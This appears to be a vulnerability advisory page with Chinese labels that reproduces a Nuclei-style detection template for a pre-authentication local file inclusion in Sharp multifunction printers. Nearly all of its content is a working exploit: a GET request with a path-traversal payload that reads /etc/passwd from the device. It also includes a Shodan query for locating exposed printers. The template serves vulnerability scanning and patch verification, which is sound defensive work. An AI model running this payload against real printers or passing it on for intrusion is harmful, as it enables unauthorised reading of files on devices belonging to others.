sharp-printers-lfi: Sharp Multifunction Printers - Local File Inclusion

日期: 2025-08-01 | 影响软件: Sharp Multifunction Printers | POC: 已公开

漏洞描述

It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.

PoC代码[已公开]

id: sharp-printers-lfi

info:
  name: Sharp Multifunction Printers - Local File Inclusion
  author: gy741
  severity: high
  description: |
    It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.
  remediation: |
    Apply all relevant security patches and product upgrades.
  reference:
    - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi
    - https://jvn.jp/en/vu/JVNVU93051062/index.html
    - https://global.sharp/products/copier/info/info_security_2024-05.html
  classification:
    cpe: cpe:2.3:o:sharp:mx-3050v_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sharp
    product: mx-3050v_firmware
    shodan-query: "Set-Cookie: MFPSESSIONID="
  tags: sharp,printer,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/installed_emanual_down.html?path=/manual/../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream; name=passwd"

      - type: status
        status:
          - 200
# digest: 490a00463044022070af61998d9b97ebcd22fcc8c38a85be9ead259e2c5a8ff282a683c4689ef3490220118a548f8e71c3cb8292eac3e65e16ed2fde0f7fae4c178d008e2e079baae8bc:922c64590222798bb761d5b6d8e72950

相关漏洞推荐